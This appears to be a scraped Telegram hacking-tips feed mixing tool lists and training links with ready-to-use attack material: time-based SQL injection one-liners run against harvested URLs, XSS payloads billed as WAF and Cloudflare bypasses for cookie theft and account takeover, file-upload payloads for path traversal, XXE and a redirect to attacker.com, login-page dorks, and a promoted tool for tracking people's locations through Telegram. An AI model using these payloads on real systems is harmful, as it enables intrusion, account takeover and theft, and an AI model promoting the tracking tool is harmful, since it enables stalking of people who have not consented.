Termux All Command [Telegram Group]

🩸Top Digital Forensics Tools 🧬Network Forensic Tools - Nmap - Wireshark - Xplico - Snort - TCPDump - The Slueth Kit 📱Mobile Forensics Tools - Elcomspoft iOS Forensic Toolkit - Mobile Verification Toolkit - Oxygen Forensic - MOBILedit - Cellebrite UFED - MSAB XRY ☢️Malware Analysis Tools - Wireshark - YARA - Malwarebytes - VirusTotal - Cuckoo Sandbox - IDA Pro 🗃️Data Recovery Tools - Recuva - EaseUS Data Recovery - TestDisk - Stellar Data Recovery - PhotoRec - Disk Drill ✉️Email Forensic Tools - MailXaminer - MailPro+ - Xtraxtor - Aid4Mail - eMailTrackerPro - Autopsy 🔍OSINT Tools - Maltego - Nmap - OSINT Framework - Shodan - Recon-ng - TheHavester ⚠️Live Forensics Tools - OS Forensics - Encase Live - CAINE - F-Response - Kali Linux Forensic Mode 📥Memory Forensics Tools - Volatility - DumpIt - memDump - Access data FTK Imager - Hibernation Recon - WindowSCOPE ☁️Cloud Forensic Tools - Magnet AXIOM - MSAB XRY Cloud - Azure CLI 🔖#infosec

Run 403 Bypass from anywhere Steps: sudo git clone https://lnkd.in/grpRHnWv /opt/4-ZERO-3 sudo chmod +x /opt/4-ZERO-3/403-bypass.sh sudo ln -sf /opt/4-ZERO-3/403-bypass.sh /usr/local/bin/403-bypass 403-bypass -h 403-bypass -u https://lnkd.in/g4t9cuEz --exploit

Find critical vulnerabilities like SQLi: Commands: 1. waymore -i http://testphp.vulnweb.com -n -mode U | tee waymore.txt 2. cat waymore.txt | gf sqli | nuclei -tags sqli -dast hashtag#ethicalhacking hashtag#sqli hashtag#bugbounty hashtag#oneliner hashtag#nuclei hashtag#waymore

𝗧𝗶𝗺𝗲 𝗯𝗮𝘀𝗲𝗱 𝗦𝗤𝗟 𝗶𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 𝘂𝘀𝗶𝗻𝗴 𝘄𝗮𝘆𝗯𝗮𝗰𝗸𝘂𝗿𝗹𝘀 waybackurls https://TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt cat urls.txt | sed 's/=/=(CASE%20WHEN%20(888=888)%20THEN%20SLEEP(5)%20ELSE%20888%20END)/g' | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && time curl "'{}'"'

Easy XSS Bounty Explained: 1. 🔍 Google Dork: inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:example[.]com 2. 👀 API endpoint: "iframe" parameter name caught my eye. 3. 👾 XSS probe: '">< Try something basic that isn't real XSS, but is least likely to get caught by a WAF or filter. 4. ⚡ Page breaks In this case it was reflected in the DOM and broke the page content in an obvious way. 5. 🛠️ XSS payload '"> 6. 🚫 Akamai WAF blocks XSS payload 7. 🔧 Akamai WAF bypass XSS Payload by Rodolfo Assis AKA Brutelogic 1'"> 8. 💥 XSS alert reflected

Get a remote job using these AI tools ➼ Interview questions – https://interviewgpt.ai ➼ Interview notes – http://metaview.ai ➼ Fix your resume – http://fixmyresume.xyz ➼ Resume scan – http://accio.springworks.in ➼ Job search – http://matchthatroleai.com ➼ Apply automatically – http://applyish.com

𝗣𝗘𝗡𝗧𝗘𝗦𝗧𝗜𝗡𝗚 𝗡𝗢𝗧𝗘𝗦 💐 >Active Directory •Initial Access •Internal Enumeration & Lateral Movement •Privilege Escalation to Domain Admin using Known Exploits •Domain Trusts >Privilege Escalation •Linux Privilege Escalation •Windows Privilege Escalation >Protocols and Services •DNS/FTP/IMAP •IPMI/MSSQL •MySQL/NFS •Oracle TNS •POP3/RDP •SMB •SMTP/SNMP >Fuzzing >Information Gathering >Utilities, Scripts and Payloads •Shells and Payloads •Metasploit Framework •File Transfers •Pivoting, Tunneling, Port Forwarding •Password Attacks >Web Applications Attacks •File Uploads •HTTP Verb Tampering •Insecure Direct Object References (IDOR) •Local File Inclusion (LFI) •Remote File Inclusion (RFI) •OS Command Injection •Cross Site Scripting (XSS) •SQL Injection •XML External Entities (XXE) >Web Application Technologies •Drupal •Gitlab •CGI Applications •Jenkins •Joomla •Microsoft IIS •osTicket •PRTG Network Monitor •Splunk •Tomcat •WordPress Link 🔗:- https://sfoffo.gitbook.io/sfoffo-pentesting-notes

WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools. : https://github.com/h4r5h1t/webcopilot

Google Dork - Login Pages inurl:login | inurl:signin | intitle:login | intitle:signin | inurl:secure site:example[.]com Find hidden login pages and admin panels Vulnerabilities to test for: 🆕 Account Creation 🔐 Default Credentials 🗡️ SQLi Auth Bypass 💪 Brute Force 📬 Password Reset Host Header Poisoning 🕸️ XSS on error or GET params #bugbounty #bugbountytips #cybersecurity #pentesting #seo #google #hacking #appsec

Please welcome the new surveillance application based on Telegram “Find people nearby” feature – CCTV (Close-Circuit Telegram Vision). You may track people all across the world sitting in your bedroom. It’s not just a simple shot and get people in a 500 meters radius, it’s based on quadrangulation (like triangulation, but using 4 points instead of 3). The accuracy is around 50-150 meters which is more then enough to understand almost the exact person’s location. The application has a real-world map so you can easily observe the country, city and a street. Implemented links allow you to immediately communicate with the person. Enjoy your CCTV data! GitHub link -> https://lnkd.in/dqiF4H53

🖥Chaining Vulnerabilities through File Upload🖥 SLQi⏳ 'sleep(20).jpg sleep(25)-- -.jpg Path traversal⏳ ../../etc/passwd/logo.png ../../../logo.png XSS⏳ -> Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>" -> Upload using .gif file GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//; -> Upload using .svg file <svg xmlns="w3.org/2000/svg" onload="alert(1)"/> -> <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert("HolyBugx XSS"); </script> </svg> Open redirect ⏳ <code> <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <svg onload="window.location='attacker.com'" xmlns="w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /> </svg> </code> XXE ⏳ <?xml version="1.0" standalone="yes"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]> <svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1 <text font-size="40" x="0" y="16">&xxe;</text> </svg>

🔥New Triaged report Sql Injection 😍 > Payload used time-based poc. ,%27%29%20AND%20%28SELECT%209683%20FROM%20%28SELECT%28SLEEP%285%29%29%29FKuq%29--%20wXyW MySQL credit: @Gotcha1G

☢️ FSOCIETY TOOLKIT ☢️ 🔰 ABOUT TOOL 🔰 If you get to this point, you can assume that you are lucky, now we will install a repository in which all the penetration testing tools have appeared on the Mr.Robot series. 🔰 FEATURES 🔰 ▪️ Information Gathering ▪️ Password Attacks ▪️ Wireless attack ▪️ Sniffing & Spoofing ▪️ Web Hacking ▪️ Private Web Hacking ▪️ Post Exploitation 🔰 INSTALL 🔰 • apt update • apt upgrade • pkg install git -y • pkg install wget -y • pkg install python2 • git clone https://github.com/Manisso/fsociety.git • cd fsociety • chmod +x install.sh • python2 fsociety.py

Web Application Testing Walkthroughs (Lessons) Vulnversity: https://tryhackme.com/room/vulnversity Burp Suite: https://tryhackme.com/room/burpsuitebasics Vulnerabilities 101: https://tryhackme.com/room/vulnerabilities101 hackerNote: https://tryhackme.com/room/hackernote Deja Vu: https://tryhackme.com/room/dejavu WebGOAT: https://tryhackme.com/room/webgoat Challenges (CTF) Basic Pentesting: https://tryhackme.com/room/basicpentestingjt WordPress CVE-2021–29447: https://tryhackme.com/room/wordpresscve202129447 Jason: https://tryhackme.com/room/jason CMSpit: https://tryhackme.com/room/cmspit Year of the Pig: https://tryhackme.com/room/yearofthepig WPScan Blog: https://tryhackme.com/room/blog Crackmapexec RA: https://tryhackme.com/room/ra Hydra Walkthroughs (Lessons) Hydra: https://tryhackme.com/room/hydra hackerNote: https://tryhackme.com/room/hackernote Brute Force Heroes: https://tryhackme.com/room/bruteforceheroes Challenges (CTF) H4cked: https://tryhackme.com/room/h4cked GoldenEye: https://tryhackme.com/room/goldeneye Undiscovered: https://tryhackme.com/room/undiscoveredup KoTH Hackers: https://tryhackme.com/room/kothhackers Pivoting Walkthroughs (Lessons) Wreath: https://tryhackme.com/room/wreath Challenges (CTF) VulnNet Internal: https://tryhackme.com/room/vulnnetinternal Unbaked Pie: https://tryhackme.com/room/unbakedpie For Business Reasons: https://tryhackme.com/room/forbusinessreasons

Practice is key to mastering everything. Enumeration Walkthroughs (Lessons) Ffuf: https://tryhackme.com/room/ffuf hackerNote: https://tryhackme.com/room/hackernote BadByte: https://tryhackme.com/room/badbyte Challenges (CTF) There are 29 Free rooms for enumeration: https://tryhackme.com/hacktivities?tab=search&page=1&free=free&order=most-popular&difficulty=all&type=challenge&searchTxt=enumeration Nmap Walkthrough (Lessons) Nmap: https://tryhackme.com/room/furthernmap Nmap Live Host Discovery: https://tryhackme.com/room/nmap01 Ice: https://tryhackme.com/room/ice RustScan: https://tryhackme.com/room/rustscan Challenges (CTF) Brooklyn Nine Nine: https://tryhackme.com/room/brooklynninenine Anonymous: https://tryhackme.com/room/anonymous Easy Peasy: https://tryhackme.com/room/easypeasyctf GoldenEye: https://tryhackme.com/room/goldeneye HA Joker CTF: https://tryhackme.com/room/jokerctf Metasploit Walkthroughs (Lessons) Metasploit Introduction: https://tryhackme.com/room/metasploitintro Post-exploitation Basics: https://tryhackme.com/room/postexploit Intro PoC Scripting: https://tryhackme.com/room/intropocscripting Ice: https://tryhackme.com/room/ice Bolt: https://tryhackme.com/room/bolt Deja vu: https://tryhackme.com/room/dejavu Challenges (CTF) Source: https://tryhackme.com/room/source Poster: https://tryhackme.com/room/poster Dirbuster Pickle Rick: https://tryhackme.com/room/picklerick Overpass: https://tryhackme.com/room/overpass

(Hard filter+Cloudflare bypassed) Stored XSS leads account takeover Payload: xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)> Tips: Always play with input's => reflecting value's tags. even there is waf/cloudflare. #bugbountytip #bugbounty